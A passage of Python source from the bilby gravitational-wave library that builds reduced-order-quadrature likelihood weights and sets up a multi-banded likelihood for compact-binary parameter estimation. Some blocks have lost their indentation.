            raise BilbyROQParamsRangeError(
                "Requested maximum frequency {} larger than ROQ basis fhigh {}"
                .format(ifo.maximum_frequency, roq_maximum_frequency))
        if ifo.minimum_frequency < roq_minimum_frequency:
            raise BilbyROQParamsRangeError(
                "Requested minimum frequency {} lower than ROQ basis flow {}"
                .format(ifo.minimum_frequency, roq_minimum_frequency))
        if ifo.strain_data.duration != roq_segment_length:
            raise BilbyROQParamsRangeError(
                "Requested duration differs from ROQ basis seglen")
        priors = self.priors
        if isinstance(priors, CBCPriorDict) is False:
            logger.warning("Unable to check ROQ parameter bounds: priors not understood")
            return
        if priors.minimum_chirp_mass is None:
            logger.warning("Unable to check minimum chirp mass ROQ bounds")
        elif priors.minimum_chirp_mass < roq_minimum_chirp_mass:
            raise BilbyROQParamsRangeError(
                "Prior minimum chirp mass {} less than ROQ basis bound {}"
                .format(priors.minimum_chirp_mass,
                        roq_minimum_chirp_mass))
        if priors.maximum_chirp_mass is None:
            logger.warning("Unable to check maximum_chirp mass ROQ bounds")
        elif priors.maximum_chirp_mass > roq_maximum_chirp_mass:
            raise BilbyROQParamsRangeError(
                "Prior maximum chirp mass {} greater than ROQ basis bound {}"
                .format(priors.maximum_chirp_mass,
                        roq_maximum_chirp_mass))
        if priors.minimum_component_mass is None:
            logger.warning("Unable to check minimum component mass ROQ bounds")
        elif priors.minimum_component_mass < roq_minimum_component_mass:
            raise BilbyROQParamsRangeError(
                "Prior minimum component mass {} less than ROQ basis bound {}"
                .format(priors.minimum_component_mass,
                        roq_minimum_component_mass))
    def _set_weights(self, linear_matrix, quadratic_matrix):
        """
        Setup the time-dependent ROQ weights.
        See https://dcc.ligo.org/LIGO-T2100125 for the detail of how to compute them.

        Parameters
        ==========
        linear_matrix, quadratic_matrix: array_like
            Arrays of the linear and quadratic basis
        """
        # Time resolution of the weight grid, set by the signal bandwidth.
        time_space = self._get_time_resolution()
        number_of_time_samples = int(self.interferometers.duration / time_space)
        # Use pyfftw for the IFFT if available; fall back to numpy otherwise.
        try:
            import pyfftw
            ifft_input = pyfftw.empty_aligned(number_of_time_samples, dtype=complex)
            ifft_output = pyfftw.empty_aligned(number_of_time_samples, dtype=complex)
            ifft = pyfftw.FFTW(ifft_input, ifft_output, direction='FFTW_BACKWARD')
        except ImportError:
            pyfftw = None
            logger.warning("You do not have pyfftw installed, falling back to numpy.fft.")
            ifft_input = np.zeros(number_of_time_samples, dtype=complex)
            ifft = np.fft.ifft
        # Keep only time samples reachable given the time prior plus a
        # light-crossing safety margin.
        earth_light_crossing_time = 2 * radius_of_earth / speed_of_light + 5 * time_space
        start_idx = max(0, int(np.floor((self.priors['{}_time'.format(self.time_reference)].minimum -
                        earth_light_crossing_time - self.interferometers.start_time) / time_space)))
        end_idx = min(number_of_time_samples - 1, int(np.ceil((
            self.priors['{}_time'.format(self.time_reference)].maximum + earth_light_crossing_time -
            self.interferometers.start_time) / time_space)))
        self.weights['time_samples'] = np.arange(start_idx, end_idx + 1) * time_space
        logger.info("Using {} ROQ time samples".format(len(self.weights['time_samples'])))
        for ifo in self.interferometers:
            if self.roq_params is not None:
                self.perform_roq_params_check(ifo)
                # Get scaled ROQ quantities
                roq_scaled_minimum_frequency = self.roq_params['flow'] * self.roq_scale_factor
                roq_scaled_maximum_frequency = self.roq_params['fhigh'] * self.roq_scale_factor
                roq_scaled_segment_length = self.roq_params['seglen'] / self.roq_scale_factor
                # Generate frequencies for the ROQ
                roq_frequencies = create_frequency_series(
                    sampling_frequency=roq_scaled_maximum_frequency * 2,
                    duration=roq_scaled_segment_length)
                roq_mask = roq_frequencies >= roq_scaled_minimum_frequency
                roq_frequencies = roq_frequencies[roq_mask]
                # Match the ROQ frequency grid against the detector grid.
                overlap_frequencies, ifo_idxs, roq_idxs = np.intersect1d(
                    ifo.frequency_array[ifo.frequency_mask], roq_frequencies,
                    return_indices=True)
            else:
                # Without roq_params assume the basis covers the full masked
                # detector frequency array one-to-one.
                overlap_frequencies = ifo.frequency_array[ifo.frequency_mask]
                roq_idxs = np.arange(linear_matrix.shape[0], dtype=int)
                ifo_idxs = np.arange(sum(ifo.frequency_mask))
                if len(ifo_idxs) != len(roq_idxs):
                    raise ValueError(
                        "Mismatch between ROQ basis and frequency array for "
                        "{}".format(ifo.name))
            logger.info(
                "Building ROQ weights for {} with {} frequencies between {} "
                "and {}.".format(
                    ifo.name, len(overlap_frequencies),
                    min(overlap_frequencies), max(overlap_frequencies)))
            ifft_input[:] *= 0.
            self.weights[ifo.name + '_linear'] = \
                np.zeros((len(self.weights['time_samples']), linear_matrix.shape[1]), dtype=complex)
            data_over_psd = ifo.frequency_domain_strain[ifo.frequency_mask][ifo_idxs] / \
                ifo.power_spectral_density_array[ifo.frequency_mask][ifo_idxs]
            # Map the overlapping bins onto the full-length IFFT input array.
            nonzero_idxs = ifo_idxs + int(ifo.frequency_array[ifo.frequency_mask][0] * self.interferometers.duration)
            # One IFFT per linear basis element gives <d|e_i> as a function
            # of arrival time.
            for i, basis_element in enumerate(linear_matrix[roq_idxs].T):
                ifft_input[nonzero_idxs] = data_over_psd * np.conj(basis_element)
                self.weights[ifo.name + '_linear'][:, i] = ifft(ifft_input)[start_idx:end_idx + 1]
            # 4/T normalisation of the inner product; the factor of
            # number_of_time_samples undoes numpy's 1/N IFFT convention.
            self.weights[ifo.name + '_linear'] *= 4. * number_of_time_samples / self.interferometers.duration
            self.weights[ifo.name + '_quadratic'] = build_roq_weights(
                1 /
                ifo.power_spectral_density_array[ifo.frequency_mask][ifo_idxs],
                quadratic_matrix[roq_idxs].real,
                1 / ifo.strain_data.duration)
            logger.info("Finished building weights for {}".format(ifo.name))
        if pyfftw is not None:
            pyfftw.forget_wisdom()
    def save_weights(self, filename, format='npz'):
        """Save the ROQ weights to ``filename`` in 'json' or 'npz' format."""
        # NOTE(review): substring check — a filename that merely contains the
        # format string (e.g. 'npz_weights') skips the extension append;
        # confirm this is intended.
        if format not in filename:
            filename += "." + format
        logger.info("Saving ROQ weights to {}".format(filename))
        if format == 'json':
            with open(filename, 'w') as file:
                json.dump(self.weights, file, indent=2, cls=BilbyJsonEncoder)
        elif format == 'npz':
            np.savez(filename, **self.weights)
    @staticmethod
    def load_weights(filename, format=None):
        """Load ROQ weights from a 'json' or 'npz' file.

        If ``format`` is None it is inferred from the filename extension.
        Returns the weights as a dict.
        """
        if format is None:
            format = filename.split(".")[-1]
        if format not in ["json", "npz"]:
            raise IOError("Format {} not recognized.".format(format))
        logger.info("Loading ROQ weights from {}".format(filename))
        if format == "json":
            with open(filename, 'r') as file:
                weights = json.load(file, object_hook=decode_bilby_json)
        elif format == "npz":
            # Wrap in dict to load data into memory
            weights = dict(np.load(filename))
        return weights
    def _get_time_resolution(self):
        """
        This method estimates the time resolution given the optimal SNR of the
        signal in the detector. This is then used when constructing the weights
        for the ROQ.

        A minimum resolution is set by assuming the SNR in each detector is at
        least 10. When the SNR is not available the SNR is assumed to be 30 in
        each detector.

        Returns
        =======
        delta_t: float
            Time resolution
        """
        def calc_fhigh(freq, psd, scaling=20.):
            """

            Parameters
            ==========
            freq: array-like
                Frequency array
            psd: array-like
                Power spectral density
            scaling: float
                SNR dependent scaling factor

            Returns
            =======
            f_high: float
                The maximum frequency which must be considered
            """
            # NOTE(review): scipy.integrate.simps is deprecated and removed
            # in SciPy >= 1.14; consider scipy.integrate.simpson.
            from scipy.integrate import simps
            integrand1 = np.power(freq, -7. / 3) / psd
            integral1 = simps(integrand1, freq)
            integrand3 = np.power(freq, 2. / 3.) / (psd * integral1)
            f_3_bar = simps(integrand3, freq)
            f_high = scaling * f_3_bar**(1 / 3)
            return f_high
        def c_f_scaling(snr):
            # SNR-dependent scaling factor for the frequency cut-off.
            return (np.pi**2 * snr**2 / 6)**(1 / 3)
        inj_snr_sq = 0
        for ifo in self.interferometers:
            inj_snr_sq += max(10, ifo.meta_data.get('optimal_SNR', 30))**2
            psd = ifo.power_spectral_density_array[ifo.frequency_mask]
            freq = ifo.frequency_array[ifo.frequency_mask]
        # psd/freq carry the values of the last interferometer in the loop.
        fhigh = calc_fhigh(freq, psd, scaling=c_f_scaling(inj_snr_sq**0.5))
        delta_t = fhigh**-1
        # Apply a safety factor to ensure the time step is short enough
        delta_t = delta_t / 5
        # duration / delta_t needs to be a power of 2 for IFFT
        number_of_time_samples = max(
            self.interferometers.duration / delta_t,
            self.interferometers.frequency_array[-1] * self.interferometers.duration + 1)
        number_of_time_samples = int(2**np.ceil(np.log2(number_of_time_samples)))
        delta_t = self.interferometers.duration / number_of_time_samples
        logger.info("ROQ time-step = {}".format(delta_t))
        return delta_t
    def _rescale_signal(self, signal, new_distance):
        """Rescale both ROQ signal components from the reference distance to
        ``new_distance`` in place (amplitude scales as 1/distance)."""
        for kind in ['linear', 'quadratic']:
            for mode in signal[kind]:
                signal[kind][mode] *= self._ref_dist / new_distance
def get_binary_black_hole_likelihood(interferometers):
    """ A wrapper to quickly set up a likelihood for BBH parameter estimation

    Builds an IMRPhenomPv2 waveform generator matched to the duration and
    sampling frequency of the supplied interferometers.

    Parameters
    ==========
    interferometers: {bilby.gw.detector.InterferometerList, list}
        A list of `bilby.detector.Interferometer` instances, typically the
        output of either `bilby.detector.get_interferometer_with_open_data`
        or `bilby.detector.get_interferometer_with_fake_noise_and_injection`

    Returns
    =======
    bilby.GravitationalWaveTransient: The likelihood to pass to `run_sampler`
    """
    generator = WaveformGenerator(
        duration=interferometers.duration,
        sampling_frequency=interferometers.sampling_frequency,
        frequency_domain_source_model=lal_binary_black_hole,
        waveform_arguments=dict(
            waveform_approximant='IMRPhenomPv2',
            reference_frequency=50,
        ),
    )
    return GravitationalWaveTransient(interferometers, generator)
class BilbyROQParamsRangeError(Exception):
    """Raised when the data or prior fall outside the ROQ basis validity range."""
    pass
class MBGravitationalWaveTransient(GravitationalWaveTransient):
"""A multi-banded likelihood object
    This uses the method described in Morisaki, 2021, arXiv: 2104.07813.
Parameters
----------
interferometers: list, bilby.gw.detector.InterferometerList
A list of `bilby.detector.Interferometer` instances - contains the detector data and power spectral densities
waveform_generator: `bilby.waveform_generator.WaveformGenerator`
An object which computes the frequency-domain strain of the signal, given some set of parameters
reference_chirp_mass: float
A reference chirp mass for determining the frequency banding
highest_mode: int, optional
The maximum magnetic number of gravitational-wave moments. Default is 2
linear_interpolation: bool, optional
If True, the linear-interpolation method is used for the computation of (h, h). If False, the IFFT-FFT method
is used. Default is True.
accuracy_factor: float, optional
A parameter to determine the accuracy of multi-banding. The larger this factor is, the more accurate the
approximation is. This corresponds to L in the paper. Default is 5.
time_offset: float, optional
(end time of data) - (maximum arrival time). If None, it is inferred from the prior of geocent time.
delta_f_end: float, optional
The frequency scale with which waveforms at the high-frequency end are smoothed. If None, it is determined from
the prior of geocent time.
maximum_banding_frequency: float, optional
A maximum frequency for multi-banding. If specified, the low-frequency limit of a band does not exceed it.
minimum_banding_duration: float, optional
A minimum duration for multi-banding. If specified, the duration of a band is not smaller than it.
distance_marginalization: bool, optional
If true, marginalize over distance in the likelihood. This uses a look up table calculated at run time. The
distance prior is set to be a delta function at the minimum distance allowed in the prior being marginalised
over.
phase_marginalization: bool, optional
If true, marginalize over phase in the likelihood. This is done analytically using a Bessel function. The phase
prior is set to be a delta function at phase=0.
priors: dict, bilby.prior.PriorDict
A dictionary of priors containing at least the geocent_time prior
distance_marginalization_lookup_table: (dict, str), optional
If a dict, dictionary containing the lookup_table, distance_array, (distance) prior_array, and
reference_distance used to construct the table. If a string the name of a file containing these quantities. The
lookup table is stored after construction in either the provided string or a default location:
'.distance_marginalization_lookup_dmin{}_dmax{}_n{}.npz'
reference_frame: (str, bilby.gw.detector.InterferometerList, list), optional
Definition of the reference frame for the sky location.
- "sky": sample in RA/dec, this is the default
- e.g., "H1L1", ["H1", "L1"], InterferometerList(["H1", "L1"]):
      sample in azimuth and zenith, `azimuth` and `zenith` defined in the frame where the z-axis is aligned with the
vector connecting H1 and L1.
time_reference: str, optional
Name of the reference for the sampled time parameter.
- "geocent"/"geocenter": sample in the time at the Earth's center, this is the default
- e.g., "H1": sample in the time of arrival at H1
Returns
-------
Likelihood: `bilby.core.likelihood.Likelihood`
A likelihood object, able to compute the likelihood of the data given some model parameters
"""
    def __init__(
            self, interferometers, waveform_generator, reference_chirp_mass, highest_mode=2, linear_interpolation=True,
            accuracy_factor=5, time_offset=None, delta_f_end=None, maximum_banding_frequency=None,
            minimum_banding_duration=0., distance_marginalization=False, phase_marginalization=False, priors=None,
            distance_marginalization_lookup_table=None, reference_frame="sky", time_reference="geocenter"
    ):
        # Time marginalization and time jitter are not supported by the
        # multi-banded likelihood.
        super(MBGravitationalWaveTransient, self).__init__(
            interferometers=interferometers, waveform_generator=waveform_generator, priors=priors,
            distance_marginalization=distance_marginalization, phase_marginalization=phase_marginalization,
            time_marginalization=False, distance_marginalization_lookup_table=distance_marginalization_lookup_table,
            jitter_time=False, reference_frame=reference_frame, time_reference=time_reference
        )
        # The assignments below go through validating property setters; the
        # order matters: maximum_banding_frequency depends on
        # reference_chirp_mass and highest_mode being set first, and
        # time_offset/delta_f_end consult self.priors.
        self.reference_chirp_mass = reference_chirp_mass
        self.highest_mode = highest_mode
        self.linear_interpolation = linear_interpolation
        self.accuracy_factor = accuracy_factor
        self.time_offset = time_offset
        self.delta_f_end = delta_f_end
        # Overall frequency range covered by the detector network.
        self.minimum_frequency = np.min([i.minimum_frequency for i in self.interferometers])
        self.maximum_frequency = np.max([i.maximum_frequency for i in self.interferometers])
        self.maximum_banding_frequency = maximum_banding_frequency
        self.minimum_banding_duration = minimum_banding_duration
        # Precompute bands, frequency points and coefficients.
        self.setup_multibanding()
@property
def reference_chirp_mass(self):
return self._reference_chirp_mass
@property
def reference_chirp_mass_in_second(self):
return gravitational_constant * self._reference_chirp_mass * solar_mass / speed_of_light**3.
@reference_chirp_mass.setter
def reference_chirp_mass(self, reference_chirp_mass):
if isinstance(reference_chirp_mass, int) or isinstance(reference_chirp_mass, float):
self._reference_chirp_mass = reference_chirp_mass
else:
raise TypeError("reference_chirp_mass must be a number")
@property
def highest_mode(self):
return self._highest_mode
@highest_mode.setter
def highest_mode(self, highest_mode):
if isinstance(highest_mode, int) or isinstance(highest_mode, float):
self._highest_mode = highest_mode
else:
raise TypeError("highest_mode must be a number")
@property
def linear_interpolation(self):
return self._linear_interpolation
@linear_interpolation.setter
def linear_interpolation(self, linear_interpolation):
if isinstance(linear_interpolation, bool):
self._linear_interpolation = linear_interpolation
else:
raise TypeError("linear_interpolation must be a bool")
@property
def accuracy_factor(self):
return self._accuracy_factor
@accuracy_factor.setter
def accuracy_factor(self, accuracy_factor):
if isinstance(accuracy_factor, int) or isinstance(accuracy_factor, float):
self._accuracy_factor = accuracy_factor
else:
raise TypeError("accuracy_factor must be a number")
    @property
    def time_offset(self):
        # Time offset assumed when constructing the frequency bands.
        return self._time_offset
    @time_offset.setter
    def time_offset(self, time_offset):
        """
        This sets the time offset assumed when frequency bands are constructed. The default value is (the
        maximum offset of geocent time in the prior range) + (light-traveling time of the Earth). If the
        prior does not contain 'geocent_time', 2.12 seconds is used. It is calculated assuming that the
        maximum offset of geocent time is 2.1 seconds, which is the value for the standard prior used by
        LIGO-Virgo-KAGRA.
        """
        time_parameter = self.time_reference + "_time"
        # Safety margin for light travel time: presumably one Earth radius
        # suffices for a geocentric time, twice that for a detector-frame
        # time — TODO confirm against the reference-frame conventions.
        if time_parameter == "geocent_time":
            safety = radius_of_earth / speed_of_light
        else:
            safety = 2 * radius_of_earth / speed_of_light
        if time_offset is not None:
            # User-supplied value wins; it must be a plain number.
            if isinstance(time_offset, int) or isinstance(time_offset, float):
                self._time_offset = time_offset
            else:
                raise TypeError("time_offset must be a number")
        elif self.priors is not None and time_parameter in self.priors:
            # Offset between the end of the data and the earliest allowed
            # arrival time, padded by the light-crossing safety margin.
            self._time_offset = (
                self.interferometers.start_time + self.interferometers.duration
                - self.priors[time_parameter].minimum + safety
            )
        else:
            # Fallback matching the standard LVK prior (see docstring).
            self._time_offset = 2.12
            logger.warning("time offset can not be inferred. Use the standard time offset of {} seconds.".format(
                self._time_offset))
    @property
    def delta_f_end(self):
        # Frequency scale for tapering the high-frequency end of the waveform.
        return self._delta_f_end
    @delta_f_end.setter
    def delta_f_end(self, delta_f_end):
        """
        This sets the frequency scale of tapering the high-frequency end of waveform, to avoid the issues of
        abrupt termination of waveform described in Sec. 2. F of arXiv: 2104.07813. This needs to be much
        larger than the inverse of the minimum time offset, and the default value is 100 times of that. If
        the prior does not contain 'geocent_time' and the minimum time offset can not be computed, 53Hz is
        used. It is computed assuming that the minimum offset of geocent time is 1.9 seconds, which is the
        value for the standard prior used by LIGO-Virgo-KAGRA.
        """
        time_parameter = self.time_reference + "_time"
        # Same light-crossing safety margin convention as the time_offset
        # setter — TODO confirm.
        if time_parameter == "geocent_time":
            safety = radius_of_earth / speed_of_light
        else:
            safety = 2 * radius_of_earth / speed_of_light
        if delta_f_end is not None:
            # User-supplied value wins; it must be a plain number.
            if isinstance(delta_f_end, int) or isinstance(delta_f_end, float):
                self._delta_f_end = delta_f_end
            else:
                raise TypeError("delta_f_end must be a number")
        elif self.priors is not None and time_parameter in self.priors:
            # 100 / (minimum time offset), with the offset measured from the
            # latest allowed arrival time to the end of the data.
            self._delta_f_end = 100 / (
                self.interferometers.start_time + self.interferometers.duration
                - self.priors[time_parameter].maximum - safety
            )
        else:
            # Fallback matching the standard LVK prior (see docstring).
            self._delta_f_end = 53.
            logger.warning("delta_f_end can not be inferred. Use the standard delta_f_end of {} Hz.".format(
                self._delta_f_end))
    @property
    def maximum_banding_frequency(self):
        # Upper limit on the starting frequency of a band.
        return self._maximum_banding_frequency
    @maximum_banding_frequency.setter
    def maximum_banding_frequency(self, maximum_banding_frequency):
        r"""
        This sets the upper limit on a starting frequency of a band. The default value is the frequency at
        which f - 1 / \sqrt(- d\tau / df) starts to decrease, because the bisection search of the starting
        frequency does not work from that frequency. The stationary phase approximation is not valid at such
        a high frequency, which can break down the approximation. It is calculated from the 0PN formula of
        time-to-merger \tau(f). The user-specified frequency is used if it is lower than that frequency.
        """
        # 0PN-derived ceiling; depends on highest_mode and the reference
        # chirp mass, so those setters must have run first (see __init__).
        fmax_tmp = (
            (15 / 968)**(3 / 5) * (self.highest_mode / (2 * np.pi))**(8 / 5)
            / self.reference_chirp_mass_in_second
        )
        if maximum_banding_frequency is not None:
            if isinstance(maximum_banding_frequency, int) or isinstance(maximum_banding_frequency, float):
                # Only tighten the limit; never exceed the 0PN ceiling.
                if maximum_banding_frequency < fmax_tmp:
                    fmax_tmp = maximum_banding_frequency
                else:
                    logger.warning("The input maximum_banding_frequency is too large."
                                   "It is set to be {} Hz.".format(fmax_tmp))
            else:
                raise TypeError("maximum_banding_frequency must be a number")
        self._maximum_banding_frequency = fmax_tmp
@property
def minimum_banding_duration(self):
return self._minimum_banding_duration
@minimum_banding_duration.setter
def minimum_banding_duration(self, minimum_banding_duration):
if isinstance(minimum_banding_duration, int) or isinstance(minimum_banding_duration, float):
self._minimum_banding_duration = minimum_banding_duration
else:
raise TypeError("minimum_banding_duration must be a number")
    def setup_multibanding(self):
        """Set up frequency bands and coefficients needed for likelihood evaluations"""
        # Band boundaries first, then the per-band integer sizes and
        # waveform frequency points that depend on them.
        self._setup_frequency_bands()
        self._setup_integers()
        self._setup_waveform_frequency_points()
        self._setup_linear_coefficients()
        # (h, h) coefficients: two alternative schemes (see class docstring).
        if self.linear_interpolation:
            self._setup_quadratic_coefficients_linear_interp()
        else:
            self._setup_quadratic_coefficients_ifft_fft()
def _tau(self, f):
"""Compute time-to-merger from the input frequency. This uses the 0PN formula.
Parameters
----------
f: float
input frequency
Returns
-------
tau: float
time-to-merger
"""
f_22 = 2. * f / self.highest_mode
return 5. / 256. * self.reference_chirp_mass_in_second * \
(np.pi * self.reference_chirp_mass_in_second * f_22)**(-8. / 3.)
def _dtaudf(self, f):
"""Compute the derivative of time-to-merger with respect to a starting frequency. This uses the 0PN formula.
Parameters
----------
f: float
input frequency
Returns
-------
dtaudf: float
derivative of time-to-merger
"""
f_22 = 2. * f / self.highest_mode
return -5. / 96. * self.reference_chirp_mass_in_second * \
(np.pi * self.reference_chirp_mass_in_second * f_22)**(-8. / 3.) / f
def _find_starting_frequency(self, duration, fnow):
"""Find the starting frequency of the next band satisfying (10) and
(51) of arXiv: 2104.07813.
Parameters
----------
duration: float
duration of the next band
fnow: float
starting frequency of the current band
Returns
-------
fnext: float or None
starting frequency of the next band. None if a frequency satisfying the conditions does not exist.
dfnext: float or None
frequency scale with which waveforms are smoothed. None if a frequency satisfying the conditions does not
exist.
"""
def _is_above_fnext(f):
"This function returns True if f > fnext"
cond1 = duration - self.time_offset - self._tau(f) - \
self.accuracy_factor * np.sqrt(-self._dtaudf(f)) > 0.
cond2 = f - 1. / np.sqrt(-self._dtaudf(f)) - fnow > 0.
return cond1 and cond2
# Bisection search for fnext
fmin, fmax = fnow, self.maximum_banding_frequency
if not _is_above_fnext(fmax):
return None, None
while fmax - fmin > 1e-2 / duration:
f = (fmin + fmax) / 2.
if _is_above_fnext(f):
fmax = f
else:
fmin = f
return f, 1. / np.sqrt(-self._dtaudf(f))
    def _setup_frequency_bands(self):
        """Set up frequency bands. The durations of bands geometrically decrease T, T/2. T/4, ..., where T is the
        original duration. This sets the following instance variables.
        durations: durations of bands (T^(b) in the paper)
        fb_dfb: the list of tuples, which contain starting frequencies (f^(b) in the paper) and frequency scales for
        smoothing waveforms (\Delta f^(b) in the paper) of bands
        """
        # First band covers the full data duration, starting at the minimum frequency.
        self.durations = [self.interferometers.duration]
        self.fb_dfb = [(self.minimum_frequency, 0.)]
        dnext = self.interferometers.duration / 2
        # Halve the duration until it no longer exceeds the time offset or the
        # user-specified minimum band duration.
        while dnext > max(self.time_offset, self.minimum_banding_duration):
            fnow, _ = self.fb_dfb[-1]
            fnext, dfnext = self._find_starting_frequency(dnext, fnow)
            # Stop adding bands once no valid starting frequency exists below the maxima.
            if fnext is not None and fnext < min(self.maximum_frequency, self.maximum_banding_frequency):
                self.durations.append(dnext)
                self.fb_dfb.append((fnext, dfnext))
                dnext /= 2
            else:
                break
        # Sentinel entry marking the upper edge of the last band.
        self.fb_dfb.append((self.maximum_frequency + self.delta_f_end, self.delta_f_end))
        logger.info("The total frequency range is divided into {} bands with frequency intervals of {}.".format(
            len(self.durations), ", ".join(["1/{} Hz".format(d) for d in self.durations])))
    def _setup_integers(self):
        """Set up integers needed for likelihood evaluations. This sets the following instance variables.
        Nbs: the numbers of samples of downsampled data (N^(b) in the paper)
        Mbs: the numbers of samples of shortened data (M^(b) in the paper)
        Ks_Ke: start and end frequency indices of bands (K^(b)_s and K^(b)_e in the paper)
        """
        self.Nbs = []
        self.Mbs = []
        self.Ks_Ke = []
        for b in range(len(self.durations)):
            dnow = self.durations[b]
            fnow, dfnow = self.fb_dfb[b]
            fnext, _ = self.fb_dfb[b + 1]
            # Power-of-two sample count large enough to cover the band up to fnext;
            # the 2**b floor keeps Nb divisible by the downsampling factor below.
            Nb = max(round_up_to_power_of_two(2. * (fnext * self.interferometers.duration + 1.)), 2**b)
            self.Nbs.append(Nb)
            self.Mbs.append(Nb // 2**b)
            # Frequency indices are counted in units of 1 / dnow.
            self.Ks_Ke.append((math.ceil((fnow - dfnow) * dnow), math.floor(fnext * dnow)))
    def _setup_waveform_frequency_points(self):
        """Set up frequency points where waveforms are evaluated. Frequency points are reordered because some waveform
        models raise an error if the input frequencies are not increasing. This adds frequency_points into the
        waveform_arguments of waveform_generator. This sets the following instance variables.
        banded_frequency_points: ndarray of total banded frequency points
        start_end_idxs: list of tuples containing start and end indices of each band
        unique_to_original_frequencies: indices converting unique frequency
        points into the original duplicated banded frequencies
        """
        self.banded_frequency_points = np.array([])
        self.start_end_idxs = []
        start_idx = 0
        for i in range(len(self.fb_dfb) - 1):
            d = self.durations[i]
            Ks, Ke = self.Ks_Ke[i]
            # Frequency points of the i-th band are integer multiples of 1/d.
            self.banded_frequency_points = np.append(self.banded_frequency_points, np.arange(Ks, Ke + 1) / d)
            end_idx = start_idx + Ke - Ks
            self.start_end_idxs.append((start_idx, end_idx))
            start_idx = end_idx + 1
        # Deduplicate: neighboring bands can share frequency points.
        unique_frequencies, idxs = np.unique(self.banded_frequency_points, return_inverse=True)
        self.waveform_generator.waveform_arguments['frequencies'] = unique_frequencies
        self.unique_to_original_frequencies = idxs
        logger.info("The number of frequency points where waveforms are evaluated is {}.".format(
            len(unique_frequencies)))
        logger.info("The speed-up gain of multi-banding is {}.".format(
            (self.maximum_frequency - self.minimum_frequency) * self.interferometers.duration /
            len(unique_frequencies)))
    def _window(self, f, b):
        """Compute window function in the b-th band
        Parameters
        ----------
        f: float or ndarray
            frequency at which the window function is computed
        b: int
            band index
        Returns
        -------
        window: float
            window function at f
        """
        fnow, dfnow = self.fb_dfb[b]
        fnext, dfnext = self.fb_dfb[b + 1]
        @np.vectorize
        def _vectorized_window(f):
            # Cosine taper rising over (fnow - dfnow, fnow), flat inside the
            # band, falling over (fnext - dfnext, fnext); zero elsewhere.
            if fnow - dfnow < f < fnow:
                return (1. + np.cos(np.pi * (f - fnow) / dfnow)) / 2.
            elif fnow <= f <= fnext - dfnext:
                return 1.
            elif fnext - dfnext < f < fnext:
                return (1. - np.cos(np.pi * (f - fnext) / dfnext)) / 2.
            else:
                return 0.
        return _vectorized_window(f)
    def _setup_linear_coefficients(self):
        """Set up coefficients by which waveforms are multiplied to compute (d, h)"""
        self.linear_coeffs = dict((ifo.name, np.array([])) for ifo in self.interferometers)
        N = self.Nbs[-1]
        for ifo in self.interferometers:
            logger.info("Pre-computing linear coefficients for {}".format(ifo.name))
            # Whitened data d / S_n on the full frequency grid (zero outside the mask).
            fddata = np.zeros(N // 2 + 1, dtype=complex)
            fddata[:len(ifo.frequency_domain_strain)][ifo.frequency_mask] += \
                ifo.frequency_domain_strain[ifo.frequency_mask] / ifo.power_spectral_density_array[ifo.frequency_mask]
            for b in range(len(self.fb_dfb) - 1):
                start_idx, end_idx = self.start_end_idxs[b]
                windows = self._window(self.banded_frequency_points[start_idx:end_idx + 1], b)
                # Downsample to the band rate: truncate in frequency, transform to
                # the time domain, keep the last M^(b) samples, transform back.
                fddata_in_ith_band = np.copy(fddata[:int(self.Nbs[b] / 2 + 1)])
                fddata_in_ith_band[-1] = 0.  # zeroing data at the Nyquist frequency
                tddata = np.fft.irfft(fddata_in_ith_band)[-self.Mbs[b]:]
                Ks, Ke = self.Ks_Ke[b]
                fddata_in_ith_band = np.fft.rfft(tddata)[Ks:Ke + 1]
                self.linear_coeffs[ifo.name] = np.append(
                    self.linear_coeffs[ifo.name], (4. / self.durations[b]) * windows * np.conj(fddata_in_ith_band))
    def _setup_quadratic_coefficients_linear_interp(self):
        """Set up coefficients by which the squares of waveforms are multiplied to compute (h, h) for the
        linear-interpolation algorithm"""
        logger.info("Linear-interpolation algorithm is used for (h, h).")
        self.quadratic_coeffs = dict((ifo.name, np.array([])) for ifo in self.interferometers)
        N = self.Nbs[-1]
        for ifo in self.interferometers:
            logger.info("Pre-computing quadratic coefficients for {}".format(ifo.name))
            full_frequencies = np.arange(N // 2 + 1) / ifo.duration
            full_inv_psds = np.zeros(N // 2 + 1)
            full_inv_psds[:len(ifo.power_spectral_density_array)][ifo.frequency_mask] = \
                1. / ifo.power_spectral_density_array[ifo.frequency_mask]
            for i in range(len(self.fb_dfb) - 1):
                start_idx, end_idx = self.start_end_idxs[i]
                banded_frequencies = self.banded_frequency_points[start_idx:end_idx + 1]
                coeffs = np.zeros(len(banded_frequencies))
                for k in range(len(coeffs) - 1):
                    # Each full-resolution frequency between two banded points
                    # contributes to both with linear-interpolation weights.
                    if k == 0:
                        start_idx_in_sum = 0
                    else:
                        start_idx_in_sum = math.ceil(ifo.duration * banded_frequencies[k])
                    if k == len(coeffs) - 2:
                        end_idx_in_sum = len(full_frequencies) - 1
                    else:
                        end_idx_in_sum = math.ceil(ifo.duration * banded_frequencies[k + 1]) - 1
                    window_over_psd = full_inv_psds[start_idx_in_sum:end_idx_in_sum + 1] \
                        * self._window(full_frequencies[start_idx_in_sum:end_idx_in_sum + 1], i)
                    frequencies_in_sum = full_frequencies[start_idx_in_sum:end_idx_in_sum + 1]
                    coeffs[k] += 4. * self.durations[i] / ifo.duration * np.sum(
                        (banded_frequencies[k + 1] - frequencies_in_sum) * window_over_psd)
                    coeffs[k + 1] += 4. * self.durations[i] / ifo.duration \
                        * np.sum((frequencies_in_sum - banded_frequencies[k]) * window_over_psd)
                self.quadratic_coeffs[ifo.name] = np.append(self.quadratic_coeffs[ifo.name], coeffs)
    def _setup_quadratic_coefficients_ifft_fft(self):
        """Set up coefficients needed for the IFFT-FFT algorithm to compute (h, h)"""
        logger.info("IFFT-FFT algorithm is used for (h, h).")
        N = self.Nbs[-1]
        # variables defined below correspond to \hat{N}^(b), \hat{T}^(b), \tilde{I}^(b)_{c, k}, h^(b)_{c, m} and
        # \sqrt{w^(b)(f^(b)_k)} \tilde{h}(f^(b)_k) in the paper
        Nhatbs = [min(2 * Mb, Nb) for Mb, Nb in zip(self.Mbs, self.Nbs)]
        self.Tbhats = [self.interferometers.duration * Nbhat / Nb for Nb, Nbhat in zip(self.Nbs, Nhatbs)]
        self.Ibcs = dict((ifo.name, []) for ifo in self.interferometers)
        self.hbcs = dict((ifo.name, []) for ifo in self.interferometers)
        self.wths = dict((ifo.name, []) for ifo in self.interferometers)
        for ifo in self.interferometers:
            logger.info("Pre-computing quadratic coefficients for {}".format(ifo.name))
            full_inv_psds = np.zeros(N // 2 + 1)
            full_inv_psds[:len(ifo.power_spectral_density_array)][ifo.frequency_mask] = 1. / \
